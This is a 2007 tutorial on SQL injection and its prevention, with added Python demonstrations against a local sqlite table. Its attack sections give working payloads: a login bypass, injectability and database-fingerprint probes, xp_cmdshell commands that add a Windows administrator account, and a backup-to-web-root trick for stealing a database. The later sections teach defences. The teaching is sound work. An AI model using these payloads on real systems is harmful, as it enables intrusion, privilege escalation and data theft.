<===================================== SQL Injection and Prevention Basics =====================================>
Author: Liu Lan
Date: 2007-5-31
<================================================================================================================>
Example:
Under normal circumstances the login query looks like this: select * from users where login = 'correct account' and password = 'correct password'
What if you enter ' or ''=' in both the account and password fields?
The SQL statement becomes:
select * from users where login = '' or ''='' and password = '' or ''=''
Does the condition after where now evaluate to true? It does: and binds tighter than or, and the final ''='' is always true, so every row in users matches and the login check is bypassed.
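The bypass described above, as an added example that is not part of the original page: a constructed sqlite users table (sqlite stands in for SQL Server here) and a login function that assembles the statement by string concatenation, exactly the vulnerable pattern shown. The table contents and the user names are assumptions made for the example.

```python
import sqlite3


def build_login_sql(login, password):
    """The page's query, assembled by string concatenation (the vulnerable pattern)."""
    return ("select * from users where login = '" + login +
            "' and password = '" + password + "'")


def make_db():
    """Constructed sample users table for this example (not from the original page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (login text, password text)")
    conn.executemany("insert into users values (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    conn.commit()
    return conn


def vulnerable_login(conn, login, password):
    """Returns the matching rows; the caller treats a non-empty result as 'logged in'."""
    return conn.execute(build_login_sql(login, password)).fetchall()


if __name__ == "__main__":
    conn = make_db()
    print(vulnerable_login(conn, "alice", "s3cret"))   # correct credentials: one row
    print(vulnerable_login(conn, "alice", "wrong"))    # wrong password: no rows
    payload = "' or ''='"                              # the input from the page
    print(build_login_sql(payload, payload))           # the rewritten statement
    print(vulnerable_login(conn, payload, payload))    # every row: the check is bypassed
```

With the payload in both fields the function returns both users, so any caller that only tests "did the query return something?" lets the attacker in without knowing a single password.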
1. What is an SQL injection attack?
An SQL injection attack supplies input that the application splices into an SQL statement without checking it, so that the statement the server executes does something the developer never intended, from reading other users' rows to running commands on the host.
2. How can I tell whether a website is injectable?
1). Step 1 (can the attack be performed at all?)
http://.../url.aspx?id=1 and 1=1    the page displays normally
http://.../url.aspx?id=1 and 1=2    the page content is blank
The id value is spliced unquoted into the query (where id=1 and 1=1 versus where id=1 and 1=2). If the two pages differ, the parameter reaches the database unchecked and the site is injectable.
2). Step 2 (which database does the server use?)
http://.../url.aspx?id=1 and (select count(*) from sysobjects)>0
If the page still displays normally, the subquery ran: sysobjects is a SQL Server system table, so the back end is SQL Server.
http://.../url.aspx?id=1 and (select count(*) from msysobjects)>0
If this one displays normally instead, msysobjects exists, so the back end is an Access database.
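Both detection steps above, as an added example that is not part of the original page: a constructed sqlite articles table and a function that splices the id value into the query the way the vulnerable page does. looks_injectable() implements the 1=1 / 1=2 comparison and catalog_probe() the system-table check; because sqlite is used in place of SQL Server or Access, its catalog sqlite_master stands in for sysobjects and msysobjects, and a catalog name the database does not have (such as sysobjects here) makes the probe fail, which is exactly how the fingerprint works.

```python
import sqlite3


def make_db():
    """Constructed sample table (not from the original page), standing in for url.aspx?id=..."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table articles (id integer, title text)")
    conn.executemany("insert into articles values (?, ?)",
                     [(1, "first post"), (2, "second post")])
    conn.commit()
    return conn


def vulnerable_page(conn, raw_id):
    """Simulates the page: the query-string value is spliced into the SQL unquoted.
    Returns the title, "" when the content is blank, or None on a database error."""
    sql = "select title from articles where id = " + raw_id
    try:
        rows = conn.execute(sql).fetchall()
    except sqlite3.Error:
        return None          # the real server would show an error page
    return rows[0][0] if rows else ""


def looks_injectable(page, base_id):
    """Step 1: injectable if 'and 1=1' leaves the page unchanged while 'and 1=2' blanks it."""
    normal = page(base_id)
    true_probe = page(base_id + " and 1=1")
    false_probe = page(base_id + " and 1=2")
    return normal not in (None, "") and true_probe == normal and false_probe == ""


def catalog_probe(page, base_id, catalog_table):
    """Step 2: succeeds only if the named system catalog exists in the back end.
    The page uses sysobjects (SQL Server) and msysobjects (Access); sqlite_master is
    the sqlite equivalent used in this example."""
    probe = base_id + " and (select count(*) from " + catalog_table + ") > 0"
    return page(probe) == page(base_id)


if __name__ == "__main__":
    conn = make_db()
    page = lambda raw: vulnerable_page(conn, raw)
    print(looks_injectable(page, "1"))                  # True: id is spliced unchecked
    print(catalog_probe(page, "1", "sqlite_master"))    # True: this catalog exists
    print(catalog_probe(page, "1", "sysobjects"))       # False: not SQL Server
```

The probe compares whole responses rather than looking for an error string, which is why it also works against a server that hides its error pages: a blanked page is as good a signal as a stack trace.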
3. How is the attack carried out?
1). Injecting into SQL Server through extended stored procedures
http://.../url.aspx?id=1; exec master..xp_cmdshell 'net user name password /add'--
Note: the statement above creates a Windows account with the given user name and password; the -- comments out whatever the application appends after the injected text.
http://.../url.aspx?id=1; exec master..xp_cmdshell 'net localgroup administrators name /add'--
Note: adds the new account to the local Administrators group. Both calls only work if the application's database login has sysadmin rights (for example sa); otherwise xp_cmdshell refuses to run. On SQL Server 2005 and later xp_cmdshell is also disabled by default and must be enabled by an administrator.
2). Finding the database in use and dumping it
http://.../url.aspx?id=1 and db_name()>0
Explanation: db_name() is a built-in function that returns the name of the current database. Comparing that string with the integer 0 forces a type conversion that fails, and the resulting error message contains the database name.
http://.../url.aspx?id=1; backup database name to disk='C:/inetpub/wwwroot/1.db';--
Note: this writes a full backup of the database (name is the value learned above) into the web root, from where it can be downloaded over HTTP (http://localhost/1.db).
Restoring the downloaded 1.db on your own SQL Server then exposes all of the data.
4. Causes of injection attacks
Attack method:
select * from users where login = '' or ''='' and password = '' or ''=''
Cause: the SQL command is built dynamically from user input that is never validated.
Attack method:
exec master..xp_cmdshell 'net user name password /add'
Cause: 1). the same injection flaw;
2) the application's database login is over-privileged (dbo on the database, or even sa), so an injected statement runs with those rights.
5. Attack prevention
1). Filter input (escape the characters that break out of a string literal)
Example: method 1 is to double every single quote (replace ' with ''), so that the quote in ' or ''=' stays inside the literal. This only protects quoted string contexts: a numeric parameter such as id=1 and 1=2 contains no quote at all, so escaping does nothing there and the value must be validated as a number instead.
2) Check the validity of user input
Make sure the input contains only the characters and format you expect. Check on both the client and the server; the server-side check is the one that counts,
because the client-side check can simply be bypassed. Whatever the client submits is untrusted.
3). Limiting the length of form fields and query-string parameters is also good programming practice; payloads like the backup command above need room.
4). Use stored procedures for queries and grant the application account only execute permission on them, with no direct rights on the tables. Parameters passed to a procedure are bound as values rather than spliced into the statement, which is the same protection a parameterized query gives; a procedure that builds dynamic SQL internally from its arguments is still injectable.
5). Do not store passwords or other sensitive fields in clear text; store a hash, so that a table dumped with the backup trick above does not hand over usable credentials. MD5, the usual choice in 2007, is no longer adequate for passwords: use a salted, deliberately slow password hash.
6). Check the number of records a query returns.
If the program expects exactly one record but more than one row comes back, treat it as an error; the ' or ''=' bypass above returns every user.
7). Least privilege for the database account
Never let the application connect as sa; grant only the rights it actually needs.
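An added example, not from the original page, that puts items 1, 2, 3, 5 and 6 above into one login routine using Python with sqlite3 and a parameterized query, so the input is bound as a value rather than spliced into the statement. The users table, the 32-character limit, the login allow-list and the use of salted PBKDF2 in place of MD5 are assumptions made here; escape_quotes() is included only to show what quote doubling does and does not cover.

```python
import hashlib
import os
import re
import sqlite3

MAX_FIELD_LEN = 32                               # item 3: cap field length (assumed value)
LOGIN_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")   # item 2: allow-list for login names (assumed)


def hash_password(password, salt=None):
    """Item 5: salted, iterated hash instead of plain MD5 (choice assumed for the example)."""
    salt = salt if salt is not None else os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)
    return salt.hex() + ":" + digest.hex()


def check_password(password, stored):
    salt_hex = stored.split(":")[0]
    return hash_password(password, bytes.fromhex(salt_hex)) == stored


def make_db():
    """Constructed sample users table (not from the original page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (login text, password text)")
    conn.executemany("insert into users values (?, ?)",
                     [("alice", hash_password("s3cret")),
                      ("bob", hash_password("hunter2"))])
    conn.commit()
    return conn


def escape_quotes(value):
    """Item 1: doubling single quotes. Defuses ' or ''=' inside a quoted literal,
    but leaves an unquoted numeric payload such as 1 and 1=2 untouched."""
    return value.replace("'", "''")


def safe_login(conn, login, password):
    """Returns True only when exactly one user matches and the password verifies."""
    if len(login) > MAX_FIELD_LEN or len(password) > MAX_FIELD_LEN:
        return False                                   # item 3
    if not LOGIN_RE.match(login):
        return False                                   # item 2
    # Parameterized query: the login is bound as a value, never part of the SQL text.
    rows = conn.execute("select password from users where login = ?",
                        (login,)).fetchall()
    if len(rows) != 1:
        return False                                   # item 6
    return check_password(password, rows[0][0])


if __name__ == "__main__":
    conn = make_db()
    print(safe_login(conn, "alice", "s3cret"))            # True
    print(safe_login(conn, "alice", "wrong"))             # False
    print(safe_login(conn, "' or ''='", "' or ''='"))     # False: rejected by the allow-list
    print(escape_quotes("' or ''='"))                     # '' or ''''=''
    print(escape_quotes("1 and 1=2"))                     # unchanged: nothing to escape
```

Even if the allow-list were removed, the parameterized query would look for a user literally named ' or ''=' and return no rows; the allow-list and the row-count check are defence in depth on top of that, and the password column now holds nothing an attacker can reuse directly if the table is dumped.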